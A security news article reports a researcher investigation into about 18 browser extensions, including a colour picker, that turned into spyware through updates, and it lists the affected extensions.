Beware the Hidden Dangers of Browser Extensions
In the era of digital convenience , many users rely on browser extensions to enhance their online experience. These tools streamline tasks, improve productivity, and add functionalities that often come in handy. With over 100,000 installations for seemingly harmless extensions, it’s easy to understand why people trust them without a second thought. However, recent research has unveiled a dark side lurking behind some of these popular tools.
According to an investigation by Koi Security, several well-rated extensions became conduits for malicious surveillance systems. Initially, these extensions provided useful features, such as color picking and video control. Yet, unbeknownst to the users, they transformed over time into spyware that tracked users indiscriminately across the web.
The Extension That Exposed the Threat
The spotlight fell on “Picker Color, Eyedropper – Geco Colorpick,” an extension with over 100,000 users and a plethora of positive reviews. For a long time, it functioned smoothly, allowing users to select colors from their screen without issues. Users had no reason to doubt its legitimacy, and trust was bolstered by a verification seal.
Yet, this reputable tool underwent a sinister change. As revealed by Koi Security researchers, in an unnoticed update, the extension began to monitor web activity , capturing URLs and sending sensitive information to a remote server. Additionally, it maintained a covert connection to a control infrastructure, effectively turning it from a tool into a surveillance mechanism.
A Broader Network of Deception
The investigation unveiled that “Picker Color” was just the tip of the iceberg. Researchers traced a web of at least 18 different extensions that operated similarly, collectively amassing over 2.3 million installations . These deceptive extensions masqueraded as productivity tools, entertainment aids, and even VPN services designed to unlock popular platforms like TikTok and Discord. Despite their apparent legitimacy, their real goal was both simple and sinister: to spy on users while appearing benign.
What set these extensions apart from conventional malware? They employed a “browser hijacking” technique activated whenever users opened new tabs or navigated between pages. This was stealthily embedded within the extension’s service, making it almost impossible for users to detect its malicious behavior.
This mechanism involved sending the page URL to a remote database alongside a unique user identifier. Attackers then had the capability to redirect users to malicious sites or simply log their browsing habits—all occurring silently, without prompting any alerts or visible failures.
Time-Bomb of Trust
One particularly alarming aspect of this issue is that these extensions were not malicious from the outset. Many had evolved over time, offering genuine functionalities before unleashing their nefarious updates . Researchers posited that this made the campaign especially dangerous; by the time users noticed the changes, they had developed trust in the extensions.
After users had downloaded these extensions, the malicious code snuck in through subsequent updates—a tactic that required no clicks, no social engineering, and no phishing attacks. The automatic updates applied the changes seamlessly, leaving users oblivious to the risk.
The Overlooked Safeguards
Even more concerning, several of these malicious extensions had been verified or promoted within the Chrome and Edge stores, misleading countless users. Their popularity further masked their malicious intent as they garnered reviews and loyal user bases.
Here are some of the extensions identified in the Reddirection campaign by Koi Security:
- PICKER COLOR, EYEDROPPER – GECO COLORPICK
- Emoji Keyboard Online – Copy & Paste Your Emoji
- Free Weather Forecast
- Weather
- Speed Controller Video – Video Manager
- UNLOCK Discord – VPN Proxy to Unblock Discord Anywhere
- UNBLOCK TIKTOK – Seamless Access With One-Click Proxy
- Unlock YouTube VPN
- Dark Theme – Dark Reader for Chrome
- Volume Max – Ultimate Sound Booster
- Volume Booster – Increase Your Sound
- Web Sound Equalizer
- Flash Player – Games Emulator
- Header Value
- Unlock Tiktok
- Volume Booster
- Web Sound Equalizer
- Flash Player
The implications of this report remain staggering. Some extensions have been removed from Chrome and Edge stores, yet others are still readily available for download. Although both Google and Microsoft have been alerted by the Koi Security team, comprehensive measures have yet to be taken against the complete set of questionable extensions.
In the rapidly evolving landscape of online safety, users must exercise caution. While browser extensions can significantly enrich the online experience, they can also pose hidden threats. Awareness and vigilance are essential in ensuring a safer browsing environment.